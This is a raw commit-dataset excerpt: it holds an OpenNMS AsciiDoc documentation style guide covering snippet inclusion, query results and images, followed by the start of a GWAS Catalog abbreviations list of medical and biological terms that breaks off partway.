can be user to hide away assertions from code examples sourced from tests.\n\nThis is how to define a code snippet inclusion:\n\n[source]\n----\n [snippet,java]\n ----\n component=opennms-examples\n source=org\/opennms\/examples\/JmxDocTest.java\n classifier=test-sources\n tag=getStartTime\n ----\n----\n\nThis is how it renders:\n\n[snippet,java]\n----\ncomponent=opennms-examples\nsource=org\/opennms\/examples\/JmxDocTest.java\nclassifier=test-sources\ntag=getStartTime\n----\n\n\n=== Query Results ===\n\nThere's a special filter for Cypher query results.\nThis is how to tag a query result:\n\n[source]\n----\n .Result\n [queryresult]\n ----\n +----------------------------------+\n | friend_of_friend.name | count(*) |\n +----------------------------------+\n | Ian | 2 |\n | Derrick | 1 |\n | Jill | 1 |\n +----------------------------------+\n 3 rows, 12 ms\n ----\n----\n\nThis is how it renders:\n\n.Result\n[queryresult]\n----\n+----------------------------------+\n| friend_of_friend.name | count(*) |\n+----------------------------------+\n| Ian | 2 |\n| Derrick | 1 |\n| Jill | 1 |\n+----------------------------------+\n3 rows, 12 ms\n----\n\n\n== A sample Java based documentation test ==\n\nFor Java, there are a couple of premade utilities that keep code and documentation together in\nJavadocs and code snippets that generate Asciidoc for the rest of the toolchain.\n\nTo illustrate this, look at the following documentation that generates the Asciidoc file +hello-world-title.asciidoc+ with a content of:\n\n[source]\n------------------------------\ninclude::{importdir}\/opennms-examples-docs-jar\/dev\/examples\/hello-world-sample-chapter.asciidoc[]\n------------------------------\n\nthis file is included in this documentation via\n\n[source]\n----\n :leveloffset: 3\n include::{importdir}\/opennms-examples-docs-jar\/dev\/examples\/hello-world-sample-chapter.asciidoc[]\n----\n\nwhich renders the following chapter:\n\n:leveloffset: 3\n\ninclude::{importdir}\/opennms-examples-docs-jar\/dev\/examples\/hello-world-sample-chapter.asciidoc[]\n\n:leveloffset: 2\n\n== Images\n\n.pris-overview.graphml\nimage::images\/pris-overview.png[pris-overview.graphml]\n\n.example.odp\nimage::images\/example.png[example.odp]\n\n","old_contents":"= Documentation Overview\n\/\/ Authors, seperated by;. They might not be shown in the overview but will be generated\nRonny Trommer <ronny@opennms.org>; Markus von R\u00fcden <mvr@opennms.com>\n:ascii-ids:\n\n[[community-docs]]\n== Writing OpenNMS Documentation\n\nNOTE: Other than writing documentation, you can help out by providing comments about improvements or reporting bugs - head over to the http:\/\/issues.opennms.org\/browse\/NMS\/component\/10011[issue tracker for documentation] to do that!\n\nFor how to build the manual see:\nhttps:\/\/github.com\/OpenNMS\/opennms\/blob\/development\/docs\/opennms-doc\/doc-overview\/README.adoc[readme]\n\nThe documents use the AsciiDoc format, see:\n\n* http:\/\/www.methods.co.nz\/asciidoc\/[Aciidoc Reference]\n* http:\/\/www.methods.co.nz\/asciidoc\/faq.html[AsciiDoc FAQ]\n* http:\/\/powerman.name\/doc\/asciidoc[AsciiDoc cheatsheet]\n* http:\/\/xpt.sourceforge.net\/techdocs\/nix\/tool\/asciidoc-syn\/ascs01-AsciiDocMarkupSyntaxQuickSummary\/single\/[AsciiDoc Cheatsheet]\n\nHere you can find other resources to get familiar with AsciiDoc, see:\n\n * http:\/\/asciidoctor.org\/docs\/user-manual[AsciiDoc User Manual]\n * http:\/\/asciidoctor.org\/docs\/install-and-use-asciidoctor-maven-plugin\/[AsciiDoc Maven Plugin]\n * https:\/\/groups.google.com\/forum\/?fromgroups#!forum\/asciidoc[AsciiDoc discussion list]\n * http:\/\/code.google.com\/p\/asciidoc\/issues\/list[AsciiDoc issue tracker]\n * https:\/\/github.com\/oreillymedia\/docbook2asciidoc[Docbook to AsciiDoc]\n * http:\/\/blog.rainwebs.net\/2010\/02\/25\/how-to-create-handsome-pdf-documents-without-frustration\/[How to create handsome PDF documents without frustration]\n\nThe cheatsheets are really useful!\n\n[[community-docs-overall-flow]]\n== Overall Flow ==\n\nEach (sub)project represents a part of the documentation, which will produce a HTML output in the file system.\nThe output is generated in the `target\/generated` sources folder.\nAsciidoc documents have the +.asciidoc+ file extension.\n\nNote that different ways to add documentation works best for different cases:\n\n* Tutorials and How To's should be published on the http:\/\/wiki.opennms.org[OpenNMS Wiki].\nFor example you want to describe how to use the Net-SNMP agent and the SNMP monitor from OpenNMS to solve a special use case with OpenNMS.\n\n* The documentation you can find in the source code can be characterized as a non-emotional technical documentation which explains concepts in detail and should be complete.\n\n== File Structure in 'opennms-doc' ==\n\n[options=\"header\", cols=\"e,d\"]\n|========================\n| Directory | Contents\n| doc-overview\/ | module with this overview documentation\n| guide-user\/ | module with the guide for people how to use and configure OpenNMS\n| guide-admin\/ | module with the guide for administrators optimizing and running OpenNMS\n| guide-development\/ | module with the guide for people who want to develop within OpenNMS\n| guide-install\/ | module with the guide how to install OpenNMS on different operating systems\n| releasenotes\/ | module with the changelog and release notes\n|========================\n\n== Headings and document structure ==\n\nEach document starts over with headings from level zero (the document title).\nEach document should have an id.\nIn some cases sections in the document need to have id's as well, this depends on where they fit in the overall structure.\nTo be able to link to content, it has to have an id. Missing id's in mandatory places will fail the build.\n\nThis is how a document should start:\n\n[source]\n----\n[[unique-id-verbose-is-ok]]\n= The Document Title =\n----\n\nTo push the headings down to the right level in the output, the +leveloffset+\nattribute is used when including the document inside of another document.\n\nSubsequent headings in a document should use the following syntax:\n\n[source]\n----\n== Subheading ==\n\n... content here ...\n\n=== Subsubheading ===\n\ncontent here ...\n\n----\n\n== Writing ==\n\nPut one sentence on each line.\nThis makes it easy to move content around, and also easy to spot (too) long sentences.\n\n== Gotchas ==\n\n* Always leave a blank line at the end of documents\n (or the title of the next document might end up in the last\n paragraph of the document)\n* As +{}+ are used for Asciidoc attributes, everything inside will be treated as an attribute.\n What you have to do is to escape the opening brace: +\\\\{+.\n If you don't, the braces and the text inside them will be removed without any warning being issued!\n\n== Links ==\n\nTo link to other parts of the manual the id of the target is used.\nThis is how such a reference looks:\n\n[source]\n----\n<<community-docs-overall-flow>>\n----\n\nWhich will render like: <<community-docs-overall-flow>>\n\n[NOTE]\nJust write \"see \\<<target-id>>\" and similar, that should suffice in most cases.\n\nIf you need to link to another document with your own link text, this is what to do:\n\n[source]\n----\n<<target-id, link text that fits in the context>>\n----\n\nNOTE: Having lots of linked text may work well in a web context but is a pain in print, and we aim for both!\n\nExternal links are added like this:\n\n[source]\n----\nhttp:\/\/www.opennms.org\/[Link text here]\n----\n\nWhich renders like: http:\/\/www.opennms.org\/[Link text here]\n\nFor short links it may be better not to add a link text, just do:\n\n[source]\n----\nhttp:\/\/www.opennms.org\/\n----\n\nWhich renders like: http:\/\/www.opennms.org\/\n\nNOTE: It's ok to have a dot right after the URL, it won't be part of the link.\n\n== Text Formatting ==\n\n* \\_Italics_ is rendered as _Italics_ and used for emphasis.\n* \\*Bold* is rendered as *Bold* and used sparingly, for strong emphasis only.\n* \\+methodName()+ is rendered as +methodName()+ and is used for literals as well\n (note: the content between the `+` signs _will_ be parsed).\n* \\`command` is rendered as `command` (typically used for command-line)\n (note: the content between the +`+ signs _will not_ be parsed).\n* Mono\\+\\+space\\++d is rendered as Mono++space++d and is used for monospaced letters.\n* \\'my\/path\/' is rendered as 'my\/path\/' (used for file names and paths).\n* \\\\``Double quoted'' (that is two grave accents to the left and two acute accents to the right) renders as ``Double quoted''.\n* \\`Single quoted' (that is a single grave accent to the left and a single acute accent to the right) renders as `Single quoted'.\n\n== Admonitions ==\n\nThese are very useful and should be used where appropriate.\nChoose from the following (write all caps and no, we can't easily add new ones):\n\nNOTE: Note.\n\nTIP: Tip.\n\nIMPORTANT: Important\n\nCAUTION: Caution\n\nWARNING: Warning\n\nHere's how it's done:\n\n[source]\n----\nNOTE: Note.\n----\n\nA multiline variation:\n\n[source]\n----\n[TIP]\nTiptext.\nLine 2.\n----\n\nWhich is rendered as:\n\n[TIP]\nTiptext.\nLine 2.\n\n== Images ==\n\nIMPORTANT: _All images in the entire manual share the same namespace._\n You know how to handle that.\n\n=== Images Files ===\n\nTo include an image file, make sure it resides in the 'images\/' directory relative to the document you're including it from. Then go:\n\n[source]\n----\nimage::neo4j-logo.png[]\n----\n\nWhich is rendered as:\n\nimage::neo4j-logo.png[]\n\n=== Static Graphviz\/DOT ===\n\nWe use the Graphviz\/DOT language to describe graphs.\nFor documentation see http:\/\/graphviz.org\/.\n\nThis is how to include a simple example graph:\n\n[source]\n----\n [\"dot\", \"community-docs-graphdb-rels.svg\"]\n ----\n \"Start node\" -> \"End node\" [label=\"relationship\"]\n ----\n----\n\nWhich is rendered as:\n\n[\"dot\", \"community-docs-graphdb-rels.svg\"]\n----\n\"Start node\" -> \"End node\" [label=\"relationship\"]\n----\n\nHere's an example using some predefined variables available in the build:\n\n[source]\n----\n [\"dot\", \"community-docs-graphdb-rels-overview.svg\", \"meta\"]\n ----\n \"A Relationship\" [fillcolor=\"NODEHIGHLIGHT\"]\n \"Start node\" [fillcolor=\"NODE2HIGHLIGHT\"]\n \"A Relationship\" -> \"Start node\" [label=\"has a\"]\n \"A Relationship\" -> \"End node\" [label=\"has a\"]\n \"A Relationship\" -> \"Relationship type\" [label=\"has a\"]\n \"Name\" [TEXTNODE]\n \"Relationship type\" -> \"Name\" [label=\"uniquely identified by\" color=\"EDGEHIGHLIGHT\" fontcolor=\"EDGEHIGHLIGHT\"]\n ----\n----\n\nWhich is rendered as:\n\n[\"dot\", \"community-docs-graphdb-rels-overview.svg\", \"meta\"]\n----\n\"A Relationship\" [fillcolor=\"NODEHIGHLIGHT\"]\n\"Start node\" [fillcolor=\"NODE2HIGHLIGHT\"]\n\"A Relationship\" -> \"Start node\" [label=\"has a\"]\n\"A Relationship\" -> \"End node\" [label=\"has a\"]\n\"A Relationship\" -> \"Relationship type\" [label=\"has a\"]\n\"Name\" [TEXTNODE]\n\"Relationship type\" -> \"Name\" [label=\"uniquely identified by\" color=\"EDGEHIGHLIGHT\" fontcolor=\"EDGEHIGHLIGHT\"]\n----\n\nThe optional second argument given to the dot filter defines the style to use:\n\n* when not defined: Default styling for nodespace examples.\n* +neoviz+: Nodespace view generated by Neoviz.\n* +meta+: Graphs that don't resemble db contents, but rather concepts.\n\nCAUTION: Keywords of the DOT language have to be surrounded by double quotes when used for other purposes.\n The keywords include _node, edge, graph, digraph, subgraph,_ and _strict_.\n\n\n== Attributes ==\n\nCommon attributes you can use in documents:\n\n* \\{opennms-version} - rendered as \"{opennms-version}\"\n* \\{opennms-git-tag} - rendered as \"{opennms-git-tag}\"\n\nThese can substitute part of URLs that point to for example APIdocs or source code.\nNote that opennms-git-tag also handles the case of snapshot\/master.\n\nSample Asciidoc attributes which can be used:\n\n* \\{docdir} - root directory of the documents\n* \\{nbsp} - non-breaking space\n\n== Comments ==\n\nThere's a separate build including comments.\nThe comments show up with a yellow background.\nThis build doesn't run by default, but after a normal build, you can use `make annotated` to build it.\nYou can also use the resulting page to search for content, as the full manual is on a single page.\n\nHere's how to write a comment:\n\n[source]\n----\n\/\/ this is a comment\n----\n\nThe comments are not visible in the normal build.\nComment blocks won't be included in the output of any build at all.\nHere's a comment block:\n\n[source]\n----\n\/\/\/\/\nNote that includes in here will still be processed, but not make it into the output.\nThat is, missing includes here will still break the build!\n\/\/\/\/\n----\n\n== Code Snippets ==\n\n=== Explicitly defined in the document ===\n\nWARNING: Use this kind of code snippets as little as possible.\n They are well known to get out of sync with reality after a while.\n\nThis is how to do it:\n\n[source,xml]\n----\n<service name=\"DNS\" interval=\"300000\" user-defined=\"false\" status=\"on\">\n <parameter key=\"retry\" value=\"2\" \/>\n <parameter key=\"timeout\" value=\"5000\" \/>\n <parameter key=\"port\" value=\"53\" \/>\n <parameter key=\"lookup\" value=\"localhost\" \/>\n <parameter key=\"fatal-response-codes\" value=\"2,3,5\" \/><!-- ServFail, NXDomain, Refused -->\n <parameter key=\"rrd-repository\" value=\"\/opt\/opennms\/share\/rrd\/response\" \/>\n <parameter key=\"rrd-base-name\" value=\"dns\" \/>\n <parameter key=\"ds-name\" value=\"dns\" \/>\n<\/service>\n----\n\nIf there's no suitable syntax highlighter, just omit the language: +[source]+.\n\nCurrently the following syntax highlighters are enabled:\n\n* Bash\n* Groovy\n* Java\n* JavaScript\n* Python\n* XML\n\nFor other highlighters we could add see https:\/\/code.google.com\/p\/google-code-prettify\/.\n\n=== Fetched from source code ===\n\nCode can be automatically fetched from source files.\nYou need to define:\n\n* component: the +artifactId+ of the Maven coordinates,\n* source: path to the file inside the jar it's deployed to,\n* classifier: +sources+ or +test-sources+ or any other classifier pointing to the artifact,\n* tag: tag name to search the file for,\n* the language of the code, if a corresponding syntax highlighter is available.\n\nNote that the artifact has to be included as a Maven dependency of the Manual project so that the files can be found.\n\nThe file will be searched for lines including +START SNIPPET: {tag}+ and +END SNIPPET: {tag}+, the lines between those will go into the output.\nBe aware of that the tag \"abc\" will match \"abcd\" as well.\nIt's a simple on\/off switch, meaning that multiple occurrences will be assembled into a single code snippet in the output.\nThis behavior can be user to hide away assertions from code examples sourced from tests.\n\nThis is how to define a code snippet inclusion:\n\n[source]\n----\n [snippet,java]\n ----\n component=opennms-examples\n source=org\/opennms\/examples\/JmxDocTest.java\n classifier=test-sources\n tag=getStartTime\n ----\n----\n\nThis is how it renders:\n\n[snippet,java]\n----\ncomponent=neo4j-examples\nsource=org\/neo4j\/examples\/JmxDocTest.java\nclassifier=test-sources\ntag=getStartTime\n----\n\n\n=== Query Results ===\n\nThere's a special filter for Cypher query results.\nThis is how to tag a query result:\n\n[source]\n----\n .Result\n [queryresult]\n ----\n +----------------------------------+\n | friend_of_friend.name | count(*) |\n +----------------------------------+\n | Ian | 2 |\n | Derrick | 1 |\n | Jill | 1 |\n +----------------------------------+\n 3 rows, 12 ms\n ----\n----\n\nThis is how it renders:\n\n.Result\n[queryresult]\n----\n+----------------------------------+\n| friend_of_friend.name | count(*) |\n+----------------------------------+\n| Ian | 2 |\n| Derrick | 1 |\n| Jill | 1 |\n+----------------------------------+\n3 rows, 12 ms\n----\n\n\n== A sample Java based documentation test ==\n\nFor Java, there are a couple of premade utilities that keep code and documentation together in\nJavadocs and code snippets that generate Asciidoc for the rest of the toolchain.\n\nTo illustrate this, look at the following documentation that generates the Asciidoc file +hello-world-title.asciidoc+ with a content of:\n\n[source]\n------------------------------\ninclude::{importdir}\/neo4j-examples-docs-jar\/dev\/examples\/hello-world-sample-chapter.asciidoc[]\n------------------------------\n\nthis file is included in this documentation via\n\n[source]\n----\n :leveloffset: 3\n include::{importdir}\/neo4j-examples-docs-jar\/dev\/examples\/hello-world-sample-chapter.asciidoc[]\n----\n\nwhich renders the following chapter:\n\n:leveloffset: 3\n\ninclude::{importdir}\/neo4j-examples-docs-jar\/dev\/examples\/hello-world-sample-chapter.asciidoc[]\n\n:leveloffset: 2\n\n== Images\n\n.pris-overview.graphml\nimage::images\/pris-overview.png[pris-overview.graphml]\n\n.example.odp\nimage::images\/example.png[example.odp]\n\n","returncode":0,"stderr":"","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"d2df75ab04402be6368272068119293c8a4e4741","subject":"Update abbreviations-content.adoc","message":"Update abbreviations-content.adoc","repos":"EBISPOT\/goci,EBISPOT\/goci,EBISPOT\/goci,EBISPOT\/goci,EBISPOT\/goci,EBISPOT\/goci","old_file":"goci-interfaces\/goci-ui\/src\/main\/docs\/abbreviations-content.adoc","new_file":"goci-interfaces\/goci-ui\/src\/main\/docs\/abbreviations-content.adoc","new_contents":"= Abbreviations\n\n== Full Description of Abbreviations used in the Catalog\n\n<<Special Characters>>, <<A>>, <<B>>, <<C>>, <<D>>, <<E>>, <<F>>, <<G>>, <<H>>, <<I>>, <<K>>, <<L>>, <<M>>, <<N>> ,<<O>>, <<P>>, <<Q>>, <<R>>, <<S>>, <<T>>, <<U>>, <<V>>, <<W>>, <<XYZ>>\n\n=== Special Characters\n\n?: A risk allele not reported\n\n\n5-HIAA: 5-hydroxyindoleacetic acid\n\n=== A\n\nA2: Biantennary nogalactosylated glycans\n\n\nAA: African ancestry\n\n\nAAM-BR: Age at menarche and buckling ratio\n\n\nAAM-CT: Age at menarche and cortical thickness\n\n\nAAM-W: Age at menarche and periosteal diameter\n\n\nAAT: alanine aminotransferase\n\n\nAAC: abdominal aortic calcium\n\n\nA action: Aggregatibacter actinomycetemcomitans\n\n\nAb: Amyloid-beta\n\n\nABI: ankle brachial index\n\n\nACA: anti-centromere antibodies\n\n\nACE: Angiotensin-converting enzyme\n\n\nACPA: antibodies to citrullinated peptide antigens\n\n\nACVn: normalised agkistrodon contortrix venom ratio\n\n\nAD: Alzheimer's Disease\n\n\nADM: Adrenomedullin\n\n\nAF: atrial fibrillation\n\n\nAFBV: Frontal Brain volume\n\n\nAFP: ? fetoprotein\n\n\nAFVB: multivariable-adjusted frontal brain volume\n\n\nAIMS: Abnormal Involuntary Movements Scale\n\n\nAIRg: Acute insulin response\n\n\nAla: Alaine\n\n\nALB: albumin\n\n\nALB\/GLB: serum albumin:globulin ratio\n\n\nALL: all ancestries\n\n\nALL-dr: combined tests of verbal delayed recall\n\n\nALLV: adjusted log lateral ventricular volume\n\n\nALP: alkaline phosphatase\n\n\nAlpha-TOH: alpha-tocopherol\n\n\nALS: amyotrophic lateral sclerosis\n\n\nALT: alanine aminotransferase\n\n\nALTHBV: multivariable-adjusted temporal horn volume\n\n\nAlkPhos: Alkaline phosphatase\n\n\nAMD: Age-related macular degeneration\n\n\nANC: Absolute neutrophil count\n\n\nANP6: N-terminal pro-atrial natriuretic peptide\n\n\nAngCAD: angiographic coronary disease\n\n\nAOI: age of smoking initiation\n\n\napoA-1: apolipoprotein A-1\n\n\naPTT: activated partial thromboplastin time\n\n\nARC: AR-C124910XX\n\n\nASD: Ostium secundum atrial septal defect\n\n\nAST: aspartate aminotransferase\n\n\nAt: antithrombin\n\n\nATA: anti-topoisomerase antibodies\n\n\nATBV: temporal brain volume\n\n\nATCBV: total cerebral brain volume\n\n\nATVB: multivariable-adjusted temporal brain volume\n\n\nAUC: area under the curve\n\n=== B\n\nBABF: baseline brachial artery flow velocity\n\n\nBARS: Barnes Akathisia Scale\n\n\nBB:\tbeta blockers\n\n\nBD: bipolar disorder\n\n\nBD-RT: bone density estimated by T score at distal radius\n\n\nBD-TT: bone density estimated by T score at midshaft tibia\n\n\nBMD: bone mineral density\n\n\nBMI: body mass index\n\n\nBMR: basal metabolic rate\n\n\nBMR RQ: respiratory quotient during basal metabolic rate measurement\n\n\nBPV: brain parenchymal volume\n\n\nBRCA1\/2: breast cancer 1 gene and breast cancer 2 gene\n\n\nBUA: Broadband ultrasound attenuation\n\n\nBUN: blood urea nitrogen\n\n=== C\n\nC: cholesterol\n\n\nC3: Propionylcarnitine\n\n\nC4: Butyrylcarnitine\n\n\nC9: Nonaylcarnitine\n\n\nC10: Decanoylcarnitine\n\n\nC10:2: Decadienylcarnitine\n\n\nC12: Dodecanoylcarnitine\n\n\nC14:1-OH: Hydroxytetradecenoylcarnitine\n\n\nCA19-9: cancer antigen 19-9\n\n\nCAC: coronary artery calcification\n\n\nCAL:coronary artery lesions\n\n\nCB-PWV: carotid brachial pulse wave velocity\n\n\nCBT: Cortical thickness of the tibia\n\n\nCC16: Clara cell secretory protein\n\n\nCCA: common carotid artery\n\n\nCCA IMT: common carotid artery intimal medial thickness\n\n\nCCB: calcium channel blockers\n\n\nCCT: central corneal thickness\n\n\nCD40L: Ligand, serum & plasma\n\n\ncDAS28: Disease Activity Score\n\n\nCDC: Complicated disease course\n\n\nCE: cholesterol ester\n\n\nCEA: carcinoembryonic antigen\n\n\nCer: ceramide\n\n\nCERAD-dr: Consortium to Establish a Registry for Alzheimer\u2019s Disease delayed recall\n\n\nCEU: CEPH (Centre d'Etude du Polymorphisme Humain) from Utah\n\n\nCF-PWVLTA: carotid-femoral pulse wave velocity, long-term average\n\n\nCGI: Clinical Global Impressions-Severity\n\n\nCHS1: 1st principal component on transformed hue and saturation values\n\n\nCK: creatinine kinase\n\n\nCKD: chronic kidney disease\n\n\ncHAQ: health assessment questionnaire score\n\n\ncHL: Classical Hodgkin lymphoma\n\n\nCIGSTAT: former\/current smokers\n\n\ncIMT: carotid intima media thickness\n\n\nCL: cleft lip without cleft palate\n\n\nCL\/P: cleft lip with or without cleft palate\n\n\nCOWA: total number of correct words across three letters\n\n\nCP: cleft palate\n\n\nCPd: Chronic periodontitis\n\n\nCPD: cigarettes per day\n\n\nCPDBI: 10 or more cigarettes per day\n\n\nCRP: C-reactive protein\n\n\nCRP average 2,6,7: C-reactive protein (CRP) averaged from 3 examinations (over about 20 years)\n\n\nCRP2: C-reactive protein, offspring exam 2\n\n\nCRP average 2,6,7: C-reactive protein average exam 2,6,7\n\n\nCRP6: C-reactive protein exam 6\n\n\nCS: cardioembolic stroke\n\n\ncSJC: Swollen joint count\n\n\ncTJC: Tender joint count\n\n\nCVD: cardiovascular disease\n\n\nCVLT-dr: California Verbal Learning Test delayed recall (belongs to WL-dr category)\n\n=== D\n\nD: particle diameter\n\n\nDBP: diastolic blood pressure\n\n\nDBPLTA: diastolic blood pressure, long-term average\n\n\nD.f.: Dermatophagoides farina\n\n\nDG: Desialylated 2AB-labelled human plasma N-glycans groups\n\n\nDGI+FUSION+WTCCC: combined results from the DGI, FUSION, WTCCC analyses\n\n\nDHEA-S: dehydroisoandrosterone sulfate\n\n\nDI: Disposition index\n\n\nDM: diabetes mellitus\n\n\nD.p.: Dermatophagoides pteronyssinus\n\n\nDWRT-dr: Delayed Word Recall Test (belongs to WL-dr category)\n\n\nDXA: dual energy X-ray absorptiometry\n\n=== E\n\nEA: European Ancestry\n\n\nEBV: Epstein-Barr virus\n\n\nEDS: excessive daytime sleepiness\n\n\nEEG: electroencephalography\n\n\nEER: estimated energy requirement\n\n\neGFR: glomerular filtration rate\n\n\neGFRcrea: estimated glomerular filtration rate based on serum creatinine\n\n\neGFRcys: serum cystatin C\n\n\nEIM: Extraintestinal manifestations\n\n\nEM: Elated mania\n\n\nER +ve: Estrogen receptor positive\n\n\nER -ve: Estrogen receptor negative\n\n\nET-1: Endothelin-1\n\n\nET: endocrine treatment\n\n\nESCC: esophageal squamous cell carcinoma\n\n\nESRD: end-stage renal disease\n\n\nESS: Epworth Sleepiness Scale\n\n\nEst-C: esterified cholesterol\n\n\nEVNV: ever smokers, never smokers\n\n=== F\n\nF2: Factor 2 (visual memory and organization)\n\n\nF3: Factor 3 (measure of attention and executive function - Trails A and B)\n\n\nFA: female athletes\n\n\nFC: free cholesterol\n\n\nFEF: forced expiratory flow\n\n\nFEV1: forced expiratory volume in 1 second\n\n\nfev1slope: longitudinal slope of forced expiratory volume in one second\n\n\nFG: fibrinogen\n\n\nFI: fasting insulin\n\n\nFLE: female long endurance athletes\n\n\nFN: femoral neck\n\n\nFNBMDm: femoral bone mineral density in males\n\n\nFPG: fasting plasma glucose\n\n\nfPS: free Protein S\n\n\nFree T3: fasting serum free triiodothyronine\n\n\nFS: female-only stroke\n\n\nFSD: female sexual dysfunction\n\n\nFSG: fasting serum glucose\n\n\nFSH: follicle-stimulating hormone\n\n\nFSIGT: frequently sampled intravenous glucose tolerance test\n\n\nFt3: free thyroxine 3\n\n\nFt4: free thyroxine\n\n\nFTD: frontotemporal dementia\n\n\nFUC-A: Antennary fucosylated glycans\n\n\nFUC-C: Core fucosylated glycans\n\n\nfuncPS: functional Protein S\n\n\nFVC: forced vital capacity\n\n\nFVII: Coagulation factors VII\n\n\nFWLTA: forward wave amplitude, long-term average\n\n=== G\n\nG3D: grade 3 diarrhea\n\n\nGBA: glucocerebrosiadase\n\n\nGGT: glutamyltranspeptidase\n\n\nGlc: Glucose\n\n\nGln: Glutamine\n\n\nGLU: glucose\n\n\nGluCer: glucosylceramide\n\n\nGOT (AST): Glutamyl oxaloacetic transaminase, Aspartate aminotransferase\n\n\nGP: Glycan peak\n\n\nGPT (ALT): glutamate pyruvate transaminase, alanine aminotransferase\n\n\nGP130: glycoprotein 130\n\n\nGSE: general side effect burden\n\n=== H\n\nHAM-A: Hamilton Anxiety Scale\n\n\nHbA1C: hemoglobin A1c\n\n\nHbF: fetal hemoglobin\n\n\nHcy: homocysteine\n\n\nHDL-C: Total cholesterol in HDL\n\n\nHER2: human epidermal growth factor receptor 2\n\n\nHgb: Hemoglobin\n\n\nHis: Histidine\n\n\nHOMA-IR: homeostasis model assessment of insulin resistance\n\n\nHIV: human immunodeficiency virus\n\n\nHDL: high density lipoprotein\n\n\nHOMA-B: homeostasis model assessment of beta-cell function\n\n\nHR: hormone receptor\n\n\nHRmax: maximum heart rate during treadmill fitness test\n\n\nHt: hematocrit\n\n\nHU: Hounsfield units\n\n\nHVA: homovanillic acid\n\n\nHVLT-dr: Hopkins Verbal Learning Test delayed recall (belongs to WL-dr category)\n\n=== I\n\nICAIMT: internal cartotid artery internal and common carotid intimal medial thickness\n\n\nICAM: Intercellular adhesion molecule\n\n\nIED: intra-extradimensional set shifting\n\n\nIGF1: insulin-like growth factor I precursor\n\n\nIGFBP-1: fasting serum insulin-like growth factor binding protein-1\n\n\nIGFBP-3: fasting serum insulin-like growth factor binding protein-3\n\n\nIL6: Interleukin-6 precursor\n\n\nIL8: Interleukin-8 precursor\n\n\nIL10: Interleukin-10 precursor\n\n\nIL12: interleukin-12 precursor\n\n\nIL18: Interleukin-18 precursor\n\n\nIL1B: Interleukin-1, beta\n\n\nIL1RA: interleukin-1 receptor antagonist protein precursor\n\n\nIM: irritable mania\n\n\nIMT: Carotid intimal medial thickness\n\n\nINS: insulin\n\n\nint: interaction\n\n\nIR: insulin resistance\n\n\nIS: all ischemic stroke\n\n\nISI_0-120: 0-120 min insulin sensitivity index\n\n=== K\n\nKD: Kawasaki disease\n\n=== L\n\nLA: linoleic acid\n\n\nLAA: large artery atherosclerosis\n\n\nLAD: left atrial diameter\n\n\nLC: lung cancer\n\n\nLDL: low density lipoprotein\n\n\nLDL-C: Total cholesterol in LDL\n\n\nLF\/HF: ratio of low frequency to high frequency power\n\n\nL-LDL-FC: The free cholesterol content of large LDL\n\n\nL-HDL-L: Total lipids in large HDL\n\n\nLp(a): lipoprotein (a)\n\n\nLS: lumbar spine\n\n\nLTG: lamotrigine-induced hypersensitivity\n\n\nLTL: leukocyte telomere length\n\n\nLVEF: Left ventricular ejection fraction\n\n\nLVD: large-vessel disease\n\n\nLVDD: left ventricular diastolic diameter\n\n\nLVFS: left ventricular fractional shortening\n\n\nLVM: left ventricular mass\n\n\nLVMI: left ventricular mass index\n\n\nLVSD: left ventricular systolic dimension\n\n\nLYM: Lymphoma subtypes\n\n=== M\n\nM: from clamp\n\n\nMA: male athletes\n\n\nMAP: mean arterial pressure\n\n\nMAPLTA: mean arterial pressure, long-term average\n\n\nmaxL*: maximum L* (reflectance)\n\n\nMC: mother's criticism\n\n\nMCH: mean corpuscular hemoglobin\n\n\nMCHC: mean corpuscular hemoglobin concentra\u00adtion\n\n\nMCI: mild cognitive impairment\n\n\nMCS: Mental Component Summary\n\n\nMCV: mean corpuscular volume\n\n\nMCP1: monocyte chemoattractant protein-1\n\n\nMDC: Mild disease course\n\n\nmeanFVC: mean forced vital capacity from 2 exams\n\n\nmeanratio: mean FEV1\/FVC from 2 exams\n\n\nMETH: Methamphetamine\n\n\nMHBMA: 2-(N-acetyl-L-cystein-S-yl)-1-hydroxybut-3-ene and 1-(N-acetyl-L-cystein-S-yl)-1-hydroxybut-3-ene\n\n\nM-HDL-L: Total lipids in medium HDL\n\n\nMHPG: 3-methoxy-4-hydroxyphenlglycol\n\n\nMI: myocardial infarction\n\n\nMIP-1b: macrophage inflammatory protein beta\n\n\nM-LDL-C: Total cholesterol in medium LDL\n\n\nM-LDL-PL: Phospholipids in medium LDL\n\n\nMLE: male long endurance athletes\n\n\nMobCH: double-bond protons of mobile lipids\n\n\nMMnb: mismatch negativity (300-710 ms)\n\n\nMMR: measles, mumps and rubella vaccination\n\n\nMMSE: Mini-mental state examination\n\n\nMSE: middle and short endurance athletes\n\n\nMSSS: Multiple Sclerosis Severity Scale\n\n\nM-VLDL-PL: Phospholipids in medium VLDL\n\n\nMW: mother's warmth\n\n=== N\n\nNA: not applicable\n\n\nNAP: non-albumin protein\n\n\nNam: Boston Naming Test\n\n\nNCI: neurocognitive impairment\n\n\nNeckZ1: Neck section modulus\n\n\nNeckZ1rf: neck section modulus in females\n\n\nNeckW1rf: neck width in females\n\n\nNeckZ1rm: neck section modulus in males\n\n\nNEFA: fasting serum nonesterified fatty acids\n\n\nNFT: neurofibrillary tangles\n\n\nNHL: Non-Hodgkin's Lymphoma\n\n\nNL: neck length\n\n\nNPC: nasopharyngeal carcinoma\n\n\nNPG: normal-pressure glaucoma\n\n\nNR: not reported\n\n\nNS: none significant\n\n\nNSA: neck shaft angle\n\n\nNSAm: neck-shaft angle in males\n\n\nNSCL\/P: nonsyndromic cleft lip with or without cleft palate\n\n\nNW: neck width\n\n\nNvrb: Non Verbal\n\n=== O\n\nOCPD: Childhood Obsessive-Compulsive Personality Disorder\n\n\nOR: odds ratio\n\n=== P\n\nP: particle concentration\n\n\nP3MRSBP: post exercise 3 minute recovery systolic blood pressure\n\n\nPAD: peripheral artery disease\n\n\nPAI-1: plasminogen activator inhibitor\n\n\nPAL: paired associates learning\n\n\nPAR-dr: paragraph delayed recall\n\n\nPC: Protein C\n\n\nPC1: principal component axis 1, CANTAB measures\n\n\nPC2: principal component analysis 2\n\n\nPC3: principal component analysis 3\n\n\nPC aa C36:3: Phosphatidylcholine diacyl C36:3\n\n\nPC aa C36:4: Phosphatidylcholine diacyl C34:4\n\n\nPCS: Physical Component Summary\n\n\nPCV: packed cell volume\n\n\nPD: Parkinson\u2019s disease\n\n\nP gingi: Porphyromonas gingivalis\n\n\nPhe: Phenylalanine\n\n\nPHT: phenytoin-induced hypersensitivity\n\n\nPKYRS: pack-years\n\n\nPL: 